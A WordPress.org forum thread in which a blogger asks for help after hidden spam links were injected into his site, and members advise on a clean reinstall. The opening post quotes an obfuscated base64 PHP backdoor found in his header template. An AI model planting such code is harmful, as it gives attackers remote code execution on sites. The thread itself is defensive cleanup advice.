WordPress.org

Forums

Spammed/hacked??? (17 posts)

  1. walkinman
    Member
    Posted 6 years ago #

    Hey Folks,

    About a month ago one my sites was spammed or hacked. Google dropped me because the pages had a bunch of invisible links heading out to viagra, et al .. I found what I thought was the source, deleted it, and changed my password, etc. google lovingly welcomed me back. Yesterday I found the same hack again - I believe it included this:

    <?php eval(base64_decode("aWYoQCRfUkVRVUVTVFsiQSJdID09ICJiIiBhbmQgaXNzZXQoJF9SRVFVRVNUWyJDIl0pKSBldmFsKHN0cmlwc2xhc2hlcyhzdHJpcHNsYXNoZXMoJF9SRVFVRVNUWyJDIl0pKSk7")); ?>

    sitting in the header template.

    There was also a file called:

    template-functions-comments.php

    on the site, and, last time, another, called:

    wp-functions.php

    in the includes folder. Are those spam files?

    That's all the files I found, anyway.

    I upgraded to the newer wordpress versions today, so hopefully that problem won't reoccur. Any further information or advice would be appreciated.

    Thank you.

    Cheers

    Carl

  2. macsoft3
    Member
    Posted 6 years ago #

    >I upgraded to the newer wordpress versions today

    Reading old posts, those users whose WP blogs have been cracked suggest that upgrading WP to the latest doesn't necessarily stop the evil from cracking them again.

    You may want to destroy all administrative usernames and create a new one, giving it a nickname like 'admin' and changing admin display name to the nickname.

  3. walkinman
    Member
    Posted 6 years ago #

    Hey macsoft,

    Thanks for the note. I'll do that, for sure.

    Thank you.

    Cheers

    Carl

  4. Roy
    Member
    Posted 6 years ago #

    Check to see if the malicious code isn't in any theme file. Upgrading doesn't help if you keep infected files.

  5. walkinman
    Member
    Posted 6 years ago #

    Hey Gangleri,

    Well, after deleting the stuff that I found, the spam links appear to be gone .. but, and this is where some experienced folks might be better able to help, I don't know if this is the kind of thing that needs to be re-injected to re-appear, or simply something that can be recalled from outside the site. It was appearing on every age before, and now I can't find it on any of the ones I looked through.

    Thank you.

    Cheers

    Carl

  6. Roy
    Member
    Posted 6 years ago #

    Well, I don't have the experience (fortunately!), but when you search the forums a bit, you'll find that in many cases some flaw is used to inject the theme with spamlinks. My advice is to get a "fresh copy" of the theme AND of the whole WP pack and of course change ALL passwords (and the username of the admin if you think they might have the passwords). Also make sure you don't use a version of WP, a theme or a plugin that is vulnerable and perhaps you want to have a look to see if there are no strange table in the database or files anywhere on your server (maybe even outside of the WP folder if you have more).

    When all is back up, have a good look at this article and follow the tips.

  7. walkinman
    Member
    Posted 6 years ago #

    Hey Gangleri,

    Thanks again. I'm using the WordPress Default theme, so if it's flawed, WP have an issue, IMO. It could be a plugin, I suppose.

    I'll check out the article, thanks so much.

    Cheers

    Carl

  8. whooami
    Member
    Posted 6 years ago #

    I'm using the WordPress Default theme, so if it's flawed, WP have an issue, IMO.

    emphasis mine.

    In your opinion? thats crap. google's cache of your site as of less than a week ago shows you were running 2.1.3

    http://74.125.95.104/search?q=cache:D3JDTW-aMboJ:www.skolaiimages.com/journal/+http://skolaiimages.com/journal/&hl=en&ct=clnk&cd=1&gl=us

    <meta name="generator" content="WordPress 2.1.3" /> <!-- leave this for stats -->

    You have been running an exploitable version of wordpress for well over a year, and while you indicated above that you were exploited a month ago, you admittedly continued to use that version?

    There's the real flaw.

  9. walkinman
    Member
    Posted 6 years ago #

    Hey whooami

    That's precisely why I upgraded yesterday. I said that in my initial post. My reply was in response to the remark that some folks apparently have indicated that even with an upgrade, the injection continues. I don't know if that'll happen or not, and I admit I'm possibly the least knowledgeable person on these boards about such things, but if the upgrades don't resolve a security problem, and the issue is related to the theme I'm running, then I'm not sure why my comment isn't reasonable.

    I guess what I'm asking is that now that the spam links seem to be gone, does that mean the bad code is gone, or is it something that can be recalled from outside (assuming I've done all the necessary password changes, etc).

    Thanks.

    Cheers

    Carl

  10. whooami
    Member
    Posted 6 years ago #

    For starters, I apologize, I misread what I quoted. I missed the "if".

    Here's the deal though, upgrading was a very wise move, no doubt. I can tell you, from experience, that that isnt the end of the process though.

    Having cleaned out a number of previously exploited wordpress installs, it;s important to take a hard look at what files are on your site. Typically, people do this when they upgrade:

    they grab the zip, they unpack the files, and they upload those new files, right on top of the content thats already there. That overwrites the wordpress files, sure -- BUT, if there is a script that has been "hidden" inside, for instance, one the many directories inside wp-includes/ that script is still there.

    When I clean out an exploited site, (and they typically need upgrades), I delete EVERYTHING except for the specific items mentioned in the codex (wp-config.php, etc..) before uploading the new wp files. That way, anything malicious is deleted.

    Its also important to insure that you dont have any rogue users in your db, especially one named wordpress. You will NOT see that in your users list; you actually have to look in the database.

    Also, take a look at this link /wp-admin/options.php (on your own site).

    there are 2 values for an upload directory. Make sure neither of them point to anything like this ../../../tmp or anything similar.

    As for theme issues, VERY early version of kubrick had one security issue, related to the search box code. Thats been fixed in later versions.

    Hope that helps.

  11. walkinman
    Member
    Posted 6 years ago #

    Hey Whooami,

    Thanks.

    I'm looking over files on the site, but I don't really know enough to know what I'm looking for.

    I looked at the db users, and didn't see anything awry there. I also deleted the old admin user, created a new one with a new password and nickname.

    When I go to wp-admin/options.php on my site I get redirected to a login page, and it will not accept my password . I have to actually get a new one and try over .. and again, even logged in already, I get a redirect to login, and it won't accept password.

    In the wp-admin folder, I have 4 files starting with 'upload'

    upload-functions.php ---- 3/17/2007
    upload-js.php ---------- 1/18/2007
    upload-rtl.css ---------- 11/14/2006
    upload.css ------------- 1/09/2007
    upload.php ------------- 10/22/2008

    I'm trying to run this plug in security thing, but can't seem to get far. I keep getting this:

    Make a backup of your database before using this tool:

    Change your database table prefix to mitigate zero-day SQL Injection attacks.

    Before running this script:

    wp-config must be set to writable before running this script.
    the database user you're using with WordPress must have ALTER rights
    Change the current: prefix to something different if it's the default wp_
    Allowed Chars are all latin Alphanumeric Chars as well as the Chars - and _.

    None of which I know what to do with.

    Sorry for my ignorance .. I can barely scrape a valid html page together, this stuff is a bit much for me.

    Thanks for your help.

    Cheers

    Carl

  12. whooami
    Member
    Posted 6 years ago #

    Hi Carl,

    Here's what worries me most about your last post:

    In the wp-admin folder, I have 4 files starting with 'upload'

    upload-functions.php ---- 3/17/2007
    upload-js.php ---------- 1/18/2007
    upload-rtl.css ---------- 11/14/2006
    upload.css ------------- 1/09/2007
    upload.php ------------- 10/22/2008

    see those old timestamps? that suggests that your last upgrade was done the way I previously described. :(

    On a clean site, just overwriting files is marginally okay. I say that because one section of the codex indicates thats "okay". Fwiw, I can find another upgrade page on the codex that explicitly says to delete files first.

    My point is that you should not have, and especially in the case of a site thats been exploited, files with old timestamps, except in the case of wp-config.php, themes, and plugins.

    The only exception to that would be if you used wget/fetch and upgraded all the files via the the command line, in which case the timestamps inside the zip/tar would be preserved.

    if you look at the 2.1.x files, these 4 files :

    upload-functions.php ---- 3/17/2007
    upload-js.php ---------- 1/18/2007
    upload-rtl.css ---------- 11/14/2006
    upload.css ------------- 1/09/2007

    are all leftovers from your old install. In fact, you can confirm this by looking at a 2.6.2 zip -==- 2.6.2 doesnt have the files inside wp-admin anymore

    If this were MY site, I would systematically delete all the files in the core directories, except for your current theme, your plugins, and your wp-config.php, and then I would upload ALL fresh files. I would do this for the reason I already explained in my last post.

  13. walkinman
    Member
    Posted 6 years ago #

    Hey Whooami

    Thanks for your help.

    Yeah, I did consider the time stamps. I wasn't sure if they should all be new files, or if any of the older files still remain.

    I fear I actually did (probably) worse than you describe. I used an automated upgrade program.

    This one.

    It ran the upgrade for me, so I didn't do much at all.

    When you say 'core directories', you mean wp/content, wp-admin, wp-includes, correct? Should I just go thru and delete all the files in those directories that are not dated 10-22-08 (excepting, of course, the theme, plugins and wp-config.php files)?

    Thanks _ I appreciate your help.

    Cheers

    Carl

  14. whooami
    Member
    Posted 6 years ago #

    Should I just go thru and delete all the files in those directories that are not dated 10-22-08

    you can do that, yes. where you might have trouble with that is inside wp-includes/js

    Again, were it me, I would delete everything in there, use an ftp client, and manually upload the files that belong there.

    Ive stressed wp-includes/ several times now, because its turned out to be, more than once, the location of choice for rootshell scripts (malicious files), in sites that Ive personally "de"-hacked.

    and yes, by core directories, I mean just what you said :)

  15. walkinman
    Member
    Posted 6 years ago #

    hey Whooami

    Thanks for the help. I think I've got it OK now. A few troubles, but we'll see how it goes. Everything's working now, anyway.

    And now I've got a note that says to upgrade yet again. :)

    So, while you're here, should I not use the auto-upgrade thing, but just upload all the core files manually?

    Thanks so much.

    Cheers

    Carl

  16. whooami
    Member
    Posted 6 years ago #

    but just upload all the core files manually?

    just upload the 2 files :) -- even easier.

  17. walkinman
    Member
    Posted 6 years ago #

    Hey Whooami,

    Perfect! Thanks so much for your help.

    Hopefully the hacking thing is done and you won't see me around no mo'. :)

    Thanks again.

    Cheers

    Carl

Topic Closed

This topic has been closed to new replies.

About this Topic